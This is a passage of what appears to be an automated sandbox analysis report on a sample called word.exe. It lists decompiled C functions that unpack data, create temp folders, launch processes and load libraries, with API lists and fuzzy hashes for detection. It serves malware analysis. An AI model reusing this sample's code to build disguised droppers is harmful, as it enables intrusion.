                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: ObjectSingleWait$CodeExitProcess
                                      • String ID:
                                      • API String ID: 2567322000-0
                                      • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                      • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                      • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                      • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 92%
                                      			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                      				long _v8;
                                      				long _t21;
                                      				long _t22;
                                      				void* _t24;
                                      				long _t26;
                                      				int _t27;
                                      				long _t28;
                                      				void* _t29;
                                      				void* _t30;
                                      				long _t31;
                                      				long _t32;
                                      				long _t36;
                                      
                                      				_t21 = _a4;
                                      				if(_t21 >= 0) {
                                      					_t32 = _t21 +  *0x42a2b8;
                                      					 *0x420ef4 = _t32;
                                      					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                      				}
                                      				_t22 = E00403479(4);
                                      				if(_t22 >= 0) {
                                      					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                                      					if(_t24 == 0) {
                                      						L18:
                                      						_push(0xfffffffd);
                                      						goto L19;
                                      					} else {
                                      						 *0x420ef4 =  *0x420ef4 + 4;
                                      						_t36 = E00403479(_a4);
                                      						if(_t36 < 0) {
                                      							L21:
                                      							_t22 = _t36;
                                      						} else {
                                      							if(_a12 != 0) {
                                      								_t26 = _a4;
                                      								if(_t26 >= _a16) {
                                      									_t26 = _a16;
                                      								}
                                      								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                      								if(_t27 != 0) {
                                      									_t36 = _v8;
                                      									 *0x420ef4 =  *0x420ef4 + _t36;
                                      									goto L21;
                                      								} else {
                                      									goto L18;
                                      								}
                                      							} else {
                                      								if(_a4 <= 0) {
                                      									goto L21;
                                      								} else {
                                      									while(1) {
                                      										_t28 = _a4;
                                      										if(_a4 >= 0x4000) {
                                      											_t28 = 0x4000;
                                      										}
                                      										_v8 = _t28;
                                      										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
                                      										if(_t29 == 0) {
                                      											goto L18;
                                      										}
                                      										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                                      										if(_t30 == 0) {
                                      											_push(0xfffffffe);
                                      											L19:
                                      											_pop(_t22);
                                      										} else {
                                      											_t31 = _v8;
                                      											_a4 = _a4 - _t31;
                                      											 *0x420ef4 =  *0x420ef4 + _t31;
                                      											_t36 = _t36 + _t31;
                                      											if(_a4 > 0) {
                                      												continue;
                                      											} else {
                                      												goto L21;
                                      											}
                                      										}
                                      										goto L22;
                                      									}
                                      									goto L18;
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				L22:
                                      				return _t22;
                                      			}















                                      0x00403375
                                      0x0040337e
                                      0x00403387
                                      0x0040338b
                                      0x00403396
                                      0x00403396
                                      0x0040339e
                                      0x004033a5
                                      0x004033b7
                                      0x004033be
                                      0x00403463
                                      0x00403463
                                      0x00000000
                                      0x004033c4
                                      0x004033c7
                                      0x004033d3
                                      0x004033d7
                                      0x00403471
                                      0x00403471
                                      0x004033dd
                                      0x004033e0
                                      0x0040343f
                                      0x00403445
                                      0x00403447
                                      0x00403447
                                      0x00403459
                                      0x00403461
                                      0x00403468
                                      0x0040346b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004033e2
                                      0x004033e5
                                      0x00000000
                                      0x004033eb
                                      0x004033f0
                                      0x004033f7
                                      0x004033fa
                                      0x004033fc
                                      0x004033fc
                                      0x00403409
                                      0x0040340c
                                      0x00403413
                                      0x00000000
                                      0x00000000
                                      0x0040341c
                                      0x00403423
                                      0x0040343b
                                      0x00403465
                                      0x00403465
                                      0x00403425
                                      0x00403425
                                      0x00403428
                                      0x0040342b
                                      0x00403431
                                      0x00403437
                                      0x00000000
                                      0x00403439
                                      0x00000000
                                      0x00403439
                                      0x00403437
                                      0x00000000
                                      0x00403423
                                      0x00000000
                                      0x004033f0
                                      0x004033e5
                                      0x004033e0
                                      0x004033d7
                                      0x004033be
                                      0x00403473
                                      0x00403476

                                      APIs
                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                      • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                      • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                      • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E004015C1(short __ebx, void* __eflags) {
                                      				void* _t17;
                                      				int _t23;
                                      				void* _t25;
                                      				signed char _t26;
                                      				short _t28;
                                      				short _t31;
                                      				short* _t34;
                                      				void* _t36;
                                      
                                      				_t28 = __ebx;
                                      				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                      				_t17 = E00405FE2(_t16);
                                      				_t32 = _t17;
                                      				if(_t17 != __ebx) {
                                      					do {
                                      						_t34 = E00405F64(_t32, 0x5c);
                                      						_t31 =  *_t34;
                                      						 *_t34 = _t28;
                                      						if(_t31 != _t28) {
                                      							L5:
                                      							_t25 = E00405C16( *(_t36 + 8));
                                      						} else {
                                      							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                      							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                                      								goto L5;
                                      							} else {
                                      								_t25 = E00405B99( *(_t36 + 8)); // executed
                                      							}
                                      						}
                                      						if(_t25 != _t28) {
                                      							if(_t25 != 0xb7) {
                                      								L9:
                                      								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                      							} else {
                                      								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                      								if((_t26 & 0x00000010) == 0) {
                                      									goto L9;
                                      								}
                                      							}
                                      						}
                                      						 *_t34 = _t31;
                                      						_t32 = _t34 + 2;
                                      					} while (_t31 != _t28);
                                      				}
                                      				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                      					_push(0xfffffff5);
                                      					E00401423();
                                      				} else {
                                      					E00401423(0xffffffe6);
                                      					E00406668(0x436000,  *(_t36 + 8));
                                      					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                      					if(_t23 == 0) {
                                      						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                      					}
                                      				}
                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                      				return 0;
                                      			}











                                      0x004015c1
                                      0x004015c9
                                      0x004015cc
                                      0x004015d1
                                      0x004015d5
                                      0x004015d7
                                      0x004015df
                                      0x004015e1
                                      0x004015e4
                                      0x004015ea
                                      0x00401604
                                      0x00401607
                                      0x004015ec
                                      0x004015ec
                                      0x004015ef
                                      0x00000000
                                      0x004015fa
                                      0x004015fd
                                      0x004015fd
                                      0x004015ef
                                      0x0040160e
                                      0x00401615
                                      0x00401624
                                      0x00401624
                                      0x00401617
                                      0x0040161a
                                      0x00401622
                                      0x00000000
                                      0x00000000
                                      0x00401622
                                      0x00401615
                                      0x00401627
                                      0x0040162b
                                      0x0040162c
                                      0x004015d7
                                      0x00401634
                                      0x00401663
                                      0x004022f1
                                      0x00401636
                                      0x00401638
                                      0x00401645
                                      0x0040164d
                                      0x00401655
                                      0x0040165b
                                      0x0040165b
                                      0x00401655
                                      0x00402c2d
                                      0x00402c39

                                      APIs
                                        • Part of subcall function 00405FE2: CharNextW.USER32(?), ref: 00405FF0
                                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                        • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                        • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                      • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                      • String ID:
                                      • API String ID: 1892508949-0
                                      • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                      • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                      • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                      • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 69%
                                      			E00401389(signed int _a4) {
                                      				intOrPtr* _t6;
                                      				void* _t8;
                                      				void* _t10;
                                      				signed int _t11;
                                      				void* _t12;
                                      				signed int _t16;
                                      				signed int _t17;
                                      				void* _t18;
                                      
                                      				_t17 = _a4;
                                      				while(_t17 >= 0) {
                                      					_t6 = _t17 * 0x1c +  *0x42a290;
                                      					if( *_t6 == 1) {
                                      						break;
                                      					}
                                      					_push(_t6); // executed
                                      					_t8 = E00401434(); // executed
                                      					if(_t8 == 0x7fffffff) {
                                      						return 0x7fffffff;
                                      					}
                                      					_t10 = E0040136D(_t8);
                                      					if(_t10 != 0) {
                                      						_t11 = _t10 - 1;
                                      						_t16 = _t17;
                                      						_t17 = _t11;
                                      						_t12 = _t11 - _t16;
                                      					} else {
                                      						_t12 = _t10 + 1;
                                      						_t17 = _t17 + 1;
                                      					}
                                      					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                      						 *0x42924c =  *0x42924c + _t12;
                                      						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
                                      					}
                                      				}
                                      				return 0;
                                      			}











                                      0x0040138a
                                      0x004013fa
                                      0x0040139b
                                      0x004013a0
                                      0x00000000
                                      0x00000000
                                      0x004013a2
                                      0x004013a3
                                      0x004013ad
                                      0x00000000
                                      0x00401404
                                      0x004013b0
                                      0x004013b7
                                      0x004013bd
                                      0x004013be
                                      0x004013c0
                                      0x004013c2
                                      0x004013b9
                                      0x004013b9
                                      0x004013ba
                                      0x004013ba
                                      0x004013c9
                                      0x004013cb
                                      0x004013f4
                                      0x004013f4
                                      0x004013c9
                                      0x00000000

                                      APIs
                                      • MulDiv.KERNEL32 ref: 004013E4
                                      • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                      • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                      • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                      • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405C4B(WCHAR* _a4) {
                                      				struct _PROCESS_INFORMATION _v20;
                                      				int _t7;
                                      
                                      				0x426750->cb = 0x44;
                                      				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                                      				if(_t7 != 0) {
                                      					CloseHandle(_v20.hThread);
                                      					return _v20.hProcess;
                                      				}
                                      				return _t7;
                                      			}





                                      0x00405c54
                                      0x00405c74
                                      0x00405c7c
                                      0x00405c81
                                      0x00000000
                                      0x00405c87
                                      0x00405c8b

                                      APIs
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,00000000), ref: 00405C74
                                      • CloseHandle.KERNEL32(?), ref: 00405C81
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID:
                                      • API String ID: 3712363035-0
                                      • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                      • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                      • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                      • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00406A35(signed int _a4) {
                                      				struct HINSTANCE__* _t5;
                                      				signed int _t10;
                                      
                                      				_t10 = _a4 << 3;
                                      				_t8 =  *(_t10 + 0x40a410);
                                      				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                      				if(_t5 != 0) {
                                      					L2:
                                      					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                      				}
                                      				_t5 = E004069C5(_t8); // executed
                                      				if(_t5 == 0) {
                                      					return 0;
                                      				}
                                      				goto L2;
                                      			}





                                      0x00406a3d
                                      0x00406a40
                                      0x00406a47
                                      0x00406a4f
                                      0x00406a5b
                                      0x00000000
                                      0x00406a62
                                      0x00406a52
                                      0x00406a59
                                      0x00000000
                                      0x00406a6a
                                      0x00000000

                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                        • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                        • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                        • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                      • String ID:
                                      • API String ID: 2547128583-0
                                      • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                      • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                      • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                      • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E00406158(WCHAR* _a4, long _a8, long _a12) {
                                      				signed int _t5;
                                      				void* _t6;
                                      
                                      				_t5 = GetFileAttributesW(_a4); // executed
                                      				asm("sbb ecx, ecx");
                                      				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                      				return _t6;
                                      			}





                                      0x0040615c
                                      0x00406169
                                      0x0040617e
                                      0x00406184

                                      APIs
                                      • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 0040615C
                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: File$AttributesCreate
                                      • String ID:
                                      • API String ID: 415043291-0
                                      • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                      • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                      • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                      • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00406133(WCHAR* _a4) {
                                      				signed char _t3;
                                      				signed char _t7;
                                      
                                      				_t3 = GetFileAttributesW(_a4); // executed
                                      				_t7 = _t3;
                                      				if(_t7 != 0xffffffff) {
                                      					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                                      				}
                                      				return _t7;
                                      			}





                                      0x00406138
                                      0x0040613e
                                      0x00406143
                                      0x0040614c
                                      0x0040614c
                                      0x00406155

                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                      • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                      • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                      • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                      • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405C16(WCHAR* _a4) {
                                      				int _t2;
                                      
                                      				_t2 = CreateDirectoryW(_a4, 0); // executed
                                      				if(_t2 == 0) {
                                      					return GetLastError();
                                      				}
                                      				return 0;
                                      			}




                                      0x00405c1c
                                      0x00405c24
                                      0x00000000
                                      0x00405c2a
                                      0x00000000

                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                      • GetLastError.KERNEL32 ref: 00405C2A
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryErrorLast
                                      • String ID:
                                      • API String ID: 1375471231-0
                                      • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                      • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                      • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                      • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040620A(void* _a4, void* _a8, long _a12) {
                                      				int _t7;
                                      				long _t11;
                                      
                                      				_t11 = _a12;
                                      				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                      				if(_t7 == 0 || _t11 != _a12) {
                                      					return 0;
                                      				} else {
                                      					return 1;
                                      				}
                                      			}





                                      0x0040620e
                                      0x0040621e
                                      0x00406226
                                      0x00000000
                                      0x0040622d
                                      0x00000000
                                      0x0040622f

                                      APIs
                                      • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 0040621E
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
